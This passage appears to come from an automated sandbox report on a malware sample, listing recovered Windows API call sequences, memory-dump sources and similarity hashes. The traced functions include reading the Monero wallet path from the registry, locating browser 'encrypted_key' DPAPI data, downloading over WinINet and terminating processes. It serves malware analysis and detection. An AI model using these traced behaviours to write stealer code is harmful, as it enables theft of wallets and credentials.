                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpymemcmp$AllocLocalmemset
                                                      • String ID: @$v10$v20
                                                      • API String ID: 3420379846-278772428
                                                      • Opcode ID: 8f9f0b0b11b8fb0923c818a210df775e9b900304ec7394e5aa2be54dfe3a81c9
                                                      • Instruction ID: b27ac19f8012b4087446923005e17a34a10f3cc1b5abaf47948a7831dd99fe03
                                                      • Opcode Fuzzy Hash: 8f9f0b0b11b8fb0923c818a210df775e9b900304ec7394e5aa2be54dfe3a81c9
                                                      • Instruction Fuzzy Hash: BB51AE31B002059BCB10EF6ADC45B9E77A4AF50318F15503AF909FB2D2DBB8ED058B98
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8E4B6
                                                      • lstrcat.KERNEL32(?,00000000), ref: 02C8E4C4
                                                      • lstrcat.KERNEL32(?,?), ref: 02C8E4DF
                                                      • lstrcat.KERNEL32(?,?), ref: 02C8E4F3
                                                      • lstrcat.KERNEL32(?,00638A84), ref: 02C8E507
                                                      • lstrcat.KERNEL32(?,?), ref: 02C8E51B
                                                      • lstrcat.KERNEL32(?,00638AC8), ref: 02C8E52E
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8E566
                                                      • GetFileAttributesA.KERNEL32(00000000), ref: 02C8E56D
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcat$lstrcpy$AttributesFile
                                                      • String ID:
                                                      • API String ID: 3428472996-0
                                                      • Opcode ID: 50497141c4dc9b5dfcf57323228a0a017200a2c71b7d8417b3d616d678081977
                                                      • Instruction ID: ad7bc4c6253b2f4aabee6e7df9a9247309b136e505dfdc46b2598c02abac20c7
                                                      • Opcode Fuzzy Hash: 50497141c4dc9b5dfcf57323228a0a017200a2c71b7d8417b3d616d678081977
                                                      • Instruction Fuzzy Hash: 6C417D759001289BCB15EF64CC88ADD77B6FF98304F0489A9F90993250EB749F89DFA1
                                                      APIs
                                                        • Part of subcall function 02C97787: lstrlen.KERNEL32(------,02C75E52), ref: 02C97792
                                                        • Part of subcall function 02C97787: lstrcpy.KERNEL32(00000000), ref: 02C977B6
                                                        • Part of subcall function 02C97787: lstrcat.KERNEL32(?,------), ref: 02C977C0
                                                        • Part of subcall function 02C976F7: lstrcpy.KERNEL32(00000000), ref: 02C97725
                                                        • Part of subcall function 02C97737: lstrcpy.KERNEL32(00000000), ref: 02C97766
                                                        • Part of subcall function 02C97737: lstrcat.KERNEL32(00000000), ref: 02C97772
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8C826
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8C84F
                                                      • ShellExecuteEx.SHELL32(0000003C), ref: 02C8C8BB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                                      • String ID: "" $<$hKC$hKC
                                                      • API String ID: 3031569214-169242861
                                                      • Opcode ID: 8cf60b048508fbb5409c62d790346db81c95bf04b9d489826a6e43704e5bd255
                                                      • Instruction ID: 40dbb5406b4ed5b1f21988f576bf2d12e5777f0520b09d229cacce3045b90193
                                                      • Opcode Fuzzy Hash: 8cf60b048508fbb5409c62d790346db81c95bf04b9d489826a6e43704e5bd255
                                                      • Instruction Fuzzy Hash: 5D516DB1D112958BCB14FFB9DC8499CB7B2AF94308F1584B9D905E7610DA30AE4ADF90
                                                      APIs
                                                        • Part of subcall function 02C97787: lstrlen.KERNEL32(------,02C75E52), ref: 02C97792
                                                        • Part of subcall function 02C97787: lstrcpy.KERNEL32(00000000), ref: 02C977B6
                                                        • Part of subcall function 02C97787: lstrcat.KERNEL32(?,------), ref: 02C977C0
                                                        • Part of subcall function 02C976F7: lstrcpy.KERNEL32(00000000), ref: 02C97725
                                                        • Part of subcall function 02C97737: lstrcpy.KERNEL32(00000000), ref: 02C97766
                                                        • Part of subcall function 02C97737: lstrcat.KERNEL32(00000000), ref: 02C97772
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8C9E2
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8CA0B
                                                      • ShellExecuteEx.SHELL32(0000003C), ref: 02C8CA6B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                                      • String ID: .dll$<$XLC$hKC
                                                      • API String ID: 3031569214-2133350058
                                                      • Opcode ID: c470ad0c4a476ad6f9457df6e99dc83b6f1dfc8336a38464864dc0b9c5fd1a26
                                                      • Instruction ID: d180c79821793bf1a246ca437b8ca5485fc9be5a5074fb03e0cc3f71c84336b8
                                                      • Opcode Fuzzy Hash: c470ad0c4a476ad6f9457df6e99dc83b6f1dfc8336a38464864dc0b9c5fd1a26
                                                      • Instruction Fuzzy Hash: D2516FB19112998BCF10FFB9CC8559CB7B2AF94308F5184B9D805E7610DB349E8ADF80
                                                      APIs
                                                      • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 02C92BB2
                                                      • GetVolumeInformationA.KERNEL32(?,00000000,00000000,02C8976D,00000000,00000000,00000000,00000000), ref: 02C92BE3
                                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 02C92C46
                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 02C92C4D
                                                      • wsprintfA.USER32 ref: 02C92C72
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                                                      • String ID: :\$C
                                                      • API String ID: 2572753744-3309953409
                                                      • Opcode ID: 013d7a5abd80eb44982cec66597c927420344f608520c3a884e76de014233dcd
                                                      • Instruction ID: 370029e30627f7d372b3ba2e1b5ada6ad17ba941e46551f486fc5d2f58b7898f
                                                      • Opcode Fuzzy Hash: 013d7a5abd80eb44982cec66597c927420344f608520c3a884e76de014233dcd
                                                      • Instruction Fuzzy Hash: A23185B1D08209AFCB04CFB88D45AEEFFBDEB58350F004169E545E7650E2348B40CBA2
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00401135
                                                      • HeapAlloc.KERNEL32(00000000), ref: 0040113C
                                                      • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00401159
                                                      • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401173
                                                      • RegCloseKey.ADVAPI32(?), ref: 0040117D
                                                      Strings
                                                      • SOFTWARE\monero-project\monero-core, xrefs: 0040114F
                                                      • wallet_path, xrefs: 0040116D
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                      • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                                                      • API String ID: 3466090806-4244082812
                                                      • Opcode ID: 3eabf35694fb7367b255f32a536ab17974b5ca8c4e5d7cae6c54b1374e0763a8
                                                      • Instruction ID: 429a39cc595111bc57384dbb44951e00fba51e8d3c52ba565137f0064186628b
                                                      • Opcode Fuzzy Hash: 3eabf35694fb7367b255f32a536ab17974b5ca8c4e5d7cae6c54b1374e0763a8
                                                      • Instruction Fuzzy Hash: D7F06D75A40308BFD7049BA09C89FEB7B7DEB04755F100059FE05E2290D6B05A448BE0
                                                      APIs
                                                      • InternetOpenA.WININET(0042CFF4,00000001,00000000,00000000,00000000), ref: 02C79346
                                                      • InternetOpenUrlA.WININET(00000000,00434B2C,00000000,00000000,80000000,00000000), ref: 02C79363
                                                      • InternetCloseHandle.WININET(00000000), ref: 02C79370
                                                        • Part of subcall function 02C881D7: memchr.MSVCRT ref: 02C88216
                                                        • Part of subcall function 02C881D7: memcmp.MSVCRT(00000000,?,?,?,00434B48,00000000), ref: 02C88230
                                                        • Part of subcall function 02C881D7: memchr.MSVCRT ref: 02C8824F
                                                        • Part of subcall function 02C78BE7: std::_Xinvalid_argument.LIBCPMT ref: 02C78BFD
                                                      • strlen.MSVCRT ref: 02C7938C
                                                      • InternetReadFile.WININET(?,?,?,00000000), ref: 02C793CD
                                                      • InternetReadFile.WININET(00000000,?,00001000,?), ref: 02C793FE
                                                      • InternetCloseHandle.WININET(00000000), ref: 02C79409
                                                      • InternetCloseHandle.WININET(00000000), ref: 02C79410
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Internet$CloseHandle$FileOpenReadmemchr$Xinvalid_argumentmemcmpstd::_strlen
                                                      • String ID:
                                                      • API String ID: 1093921401-0
                                                      • Opcode ID: ec4cbb5dbbd37489c1cf68316e3847bbf2b1f5292038445eee392468e9e8c8fb
                                                      • Instruction ID: 942be307469feda5a992f30240a003ac60a7235fa1a62843a77e29bd833c31b7
                                                      • Opcode Fuzzy Hash: ec4cbb5dbbd37489c1cf68316e3847bbf2b1f5292038445eee392468e9e8c8fb
                                                      • Instruction Fuzzy Hash: 5051E9716002045BD720DBA8DC44BEEF7FAEB88714F14416AF505E32C0DBB4E644DBA5
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040565A
                                                      • HeapAlloc.KERNEL32(00000000), ref: 00405661
                                                      • InternetOpenA.WININET(Function_0002CFF4,00000000,00000000,00000000,00000000), ref: 00405677
                                                      • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 00405692
                                                      • InternetReadFile.WININET(?,?,00000400,00000001), ref: 004056BC
                                                      • memcpy.MSVCRT(00000000,?,00000001), ref: 004056E1
                                                      • InternetCloseHandle.WININET(?), ref: 004056FA
                                                      • InternetCloseHandle.WININET(00000000), ref: 00405701
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Internet$CloseHandleHeapOpen$AllocFileProcessReadmemcpy
                                                      • String ID:
                                                      • API String ID: 3894370878-0
                                                      • Opcode ID: 39bfd9abbbfd464b144cda71feed78c781dd4d2607ed895f946f54a5c8bb3dbb
                                                      • Instruction ID: 71c2a2d1e8b1bff0245bb1ace4ede4100b9513cc3bd865d9341d2d7473e0af64
                                                      • Opcode Fuzzy Hash: 39bfd9abbbfd464b144cda71feed78c781dd4d2607ed895f946f54a5c8bb3dbb
                                                      • Instruction Fuzzy Hash: FB415C70A00605AFDB24CF54DD88B9BB7B5FF48304F14806AE909AB3D1D7759941CFA8
                                                      APIs
                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00424969
                                                      • Process32First.KERNEL32(00000000,00000128), ref: 00424979
                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 0042498B
                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004249AC
                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 004249BB
                                                      • CloseHandle.KERNEL32(00000000), ref: 004249C2
                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 004249D0
                                                      • CloseHandle.KERNEL32(00000000), ref: 004249DB
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                                      • String ID:
                                                      • API String ID: 3836391474-0
                                                      • Opcode ID: 52672e04caeec890ace4a1d791050bff1080cdcf40c9c1db2d30368871fa3206
                                                      • Instruction ID: 1dcc0a632c58819bc0603b9dca4f2ab71f075bb114674fc9a8b609d01bacb988
                                                      • Opcode Fuzzy Hash: 52672e04caeec890ace4a1d791050bff1080cdcf40c9c1db2d30368871fa3206
                                                      • Instruction Fuzzy Hash: 860180B1601224ABE7215B70AC89FEB776DEB48751F00118AF909D2290DFB49D908EA4
                                                      APIs
                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 02C94BD0
                                                      • Process32First.KERNEL32(00000000,00000128), ref: 02C94BE0
                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 02C94BF2
                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 02C94C13
                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 02C94C22
                                                      • CloseHandle.KERNEL32(00000000), ref: 02C94C29
                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 02C94C37
                                                      • CloseHandle.KERNEL32(00000000), ref: 02C94C42
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                                      • String ID:
                                                      • API String ID: 3836391474-0
                                                      • Opcode ID: 52672e04caeec890ace4a1d791050bff1080cdcf40c9c1db2d30368871fa3206
                                                      • Instruction ID: 93cb1277877fc57b84c0c9a042a6812569ce4495034f74c739d86ec097ccb824
                                                      • Opcode Fuzzy Hash: 52672e04caeec890ace4a1d791050bff1080cdcf40c9c1db2d30368871fa3206
                                                      • Instruction Fuzzy Hash: CF019271641614AFEB345B609C8DFEA777DEB48752F001188F90992191DFB0CA90CAB0
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C7E92C
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C7E955
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C7E98E
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C7E9B4
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C7E9EB
                                                      • FindNextFileA.KERNEL32(00000000,?), ref: 02C7EA21
                                                      • FindClose.KERNEL32(00000000), ref: 02C7EA30
                                                        • Part of subcall function 02C71797: lstrcpy.KERNEL32(00000000,?), ref: 02C717BE
                                                        • Part of subcall function 02C71797: lstrcpy.KERNEL32(00000000,?), ref: 02C717E0
                                                        • Part of subcall function 02C71797: lstrcpy.KERNEL32(00000000,?), ref: 02C71802
                                                        • Part of subcall function 02C71797: lstrcpy.KERNEL32(00000000,?), ref: 02C71866
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$Find$CloseFileNext
                                                      • String ID:
                                                      • API String ID: 1875835556-0
                                                      • Opcode ID: 6fdd74faf7a7e66fe5d0f030622722a7a94ed3865e5b6c3e1762540d0db14b48
                                                      • Instruction ID: c0941da13553d1fb545176d03d2338bd671d76733494e2ab52401088d4e07c77
                                                      • Opcode Fuzzy Hash: 6fdd74faf7a7e66fe5d0f030622722a7a94ed3865e5b6c3e1762540d0db14b48
                                                      • Instruction Fuzzy Hash: 28020C76A012118FDB28CF29C584B65BBE5BF84718B19C0EDD809DB3A1D772E942CF90
                                                      APIs
                                                      • memset.MSVCRT ref: 02C7A0D6
                                                      • LocalAlloc.KERNEL32(00000040), ref: 02C7A10E
                                                        • Part of subcall function 02C97657: lstrcpy.KERNEL32(00000000,ERROR), ref: 02C97675
                                                      • lstrcpy.KERNEL32(00000000,00434C50), ref: 02C7A219
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$AllocLocalmemset
                                                      • String ID: @$DLC$HLC
                                                      • API String ID: 4098468873-1894397651
                                                      • Opcode ID: f1e8425887af69d33d029186a1e0f3ff7f5477a46881576f8d76e6f871c47b0f
                                                      • Instruction ID: e94b26448a349ca1d2513fcb1e0afbb923288247a39beda69398eae6d41fb83b
                                                      • Opcode Fuzzy Hash: f1e8425887af69d33d029186a1e0f3ff7f5477a46881576f8d76e6f871c47b0f
                                                      • Instruction Fuzzy Hash: 02510071A002899BEB00EF69DC84BDD7BB5EF94318F154025ED08AB240EB70ED45CF91
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(?), ref: 0040723E
                                                      • GetProcessHeap.KERNEL32(00000008,00000010), ref: 00407279
                                                      • HeapAlloc.KERNEL32(00000000), ref: 00407280
                                                      • memcpy.MSVCRT(00000000,?), ref: 004072AD
                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 004072C3
                                                      • HeapFree.KERNEL32(00000000), ref: 004072CA
                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00407329
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                       • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmp
                                                       • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmp
                                                       • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                       • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$Process$AddressAllocFreeLibraryLoadProcmemcpy
                                                      • String ID:
                                                      • API String ID: 1745114167-0
                                                      • Opcode ID: b8b6d1e05054ea07a43d014ff49ccb22529942b78b606a01fe6625217ee999e1
                                                      • Instruction ID: 5c04f978e963cdea92a01edc1f3ad230323f660b4d2968f88ba47752cd35672e
                                                      • Opcode Fuzzy Hash: b8b6d1e05054ea07a43d014ff49ccb22529942b78b606a01fe6625217ee999e1
                                                      • Instruction Fuzzy Hash: 35416B71B046069BEB20CF69DC84BAAB3E9FB84305F1445BAEC49D7380E635F900DB65
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(?), ref: 02C774A5
                                                      • GetProcessHeap.KERNEL32(00000008,00000010), ref: 02C774E0
                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 02C774E7
                                                      • memcpy.MSVCRT(00000000,?), ref: 02C77514
                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 02C7752A
                                                      • HeapFree.KERNEL32(00000000), ref: 02C77531
                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 02C77590
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProcmemcpy
                                                      • String ID:
                                                      • API String ID: 413393563-0
                                                      • Opcode ID: b8b6d1e05054ea07a43d014ff49ccb22529942b78b606a01fe6625217ee999e1
                                                      • Instruction ID: 6520609a1e3d518716447f8ad2c879fd6bb04046e29d4a4915758cab7881ad8a
                                                      • Opcode Fuzzy Hash: b8b6d1e05054ea07a43d014ff49ccb22529942b78b606a01fe6625217ee999e1
                                                      • Instruction Fuzzy Hash: 0D416D71B007099BDB60CF69DC84BAAF7E9EB84309F1445A9E84EC7310E775E904CB90
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000), ref: 00409CA8
                                                      • LocalAlloc.KERNEL32(00000040,?), ref: 00409CDA
                                                      • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D03
                                                      • memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D3C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                       • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmp
                                                       • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmp
                                                       • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                       • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocLocallstrcpymemcmp
                                                      • String ID: $"encrypted_key":"$DPAPI
                                                      • API String ID: 4154055062-738592651
                                                      • Opcode ID: ee76a46e03c395f16d6886720c5a89f914cd7747952363acaa8c1ee084f86bd8
                                                      • Instruction ID: 6c8d556d21e19e5d3b0639c321864ed51762282b360f53d65d825accd8ba46b4
                                                      • Opcode Fuzzy Hash: ee76a46e03c395f16d6886720c5a89f914cd7747952363acaa8c1ee084f86bd8
                                                      • Instruction Fuzzy Hash: 48418E31B0020A9BDB21EF69DD456AF77B4AF44308F04407AED15B72E3DA78AD04CB98
                                                      APIs
                                                      • strtok_s.MSVCRT ref: 004181B5
                                                      • lstrlenA.KERNEL32(00000000), ref: 004181FB
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 0041822A
                                                      • StrCmpCA.SHLWAPI(00000000,00434C44), ref: 00418242
                                                      • lstrlenA.KERNEL32(00000000), ref: 00418280
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 004182AF
                                                      • strtok_s.MSVCRT ref: 004182BF
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                       • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmp
                                                       • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmp
                                                       • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                       • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpylstrlenstrtok_s
                                                      • String ID:
                                                      • API String ID: 3280532728-0
                                                      • Opcode ID: 1a58f1b32fa22629d4b6815d1c469958d462c1abccdf26540bb9a773ebb1c3c0
                                                      • Instruction ID: 44e3f82219f4b5846f9302bf287b5fdcc788e1807cf968ce595ad677923a09cd
                                                      • Opcode Fuzzy Hash: 1a58f1b32fa22629d4b6815d1c469958d462c1abccdf26540bb9a773ebb1c3c0
                                                      • Instruction Fuzzy Hash: D4417E756006069FCB22DF68DA48BABBBB4EF44700F10416EAC49D7344EB78D981CB99
                                                      APIs
                                                      • strtok_s.MSVCRT ref: 02C8841C
                                                      • lstrlen.KERNEL32(00000000), ref: 02C88462
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C88491
                                                      • StrCmpCA.SHLWAPI(00000000,00434C44), ref: 02C884A9
                                                      • lstrlen.KERNEL32(00000000), ref: 02C884E7
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C88516
                                                      • strtok_s.MSVCRT ref: 02C88526
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpylstrlenstrtok_s
                                                      • String ID:
                                                      • API String ID: 3280532728-0
                                                      • Opcode ID: 1bc2e37c1a21135defa26a9ed81cbec90adad79c8ff921a3e68a1739e3be9e3d
                                                      • Instruction ID: 19c2239f765859a9a30143d7dff52f37188c4727ddd9f692f09d1d730d7748f3
                                                      • Opcode Fuzzy Hash: 1bc2e37c1a21135defa26a9ed81cbec90adad79c8ff921a3e68a1739e3be9e3d
                                                      • Instruction Fuzzy Hash: CF419E7560020A9FDB21EF78D954BAABBF5EF84708F508219EC49D7644EB34EA41CF90
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 02C758C1
                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 02C758C8
                                                      • InternetOpenA.WININET(0042CFF4,00000000,00000000,00000000,00000000), ref: 02C758DE
                                                      • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 02C758F9
                                                      • InternetReadFile.WININET(?,?,00000400,00000001), ref: 02C75923
                                                      • InternetCloseHandle.WININET(?), ref: 02C75961
                                                      • InternetCloseHandle.WININET(00000000), ref: 02C75968
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
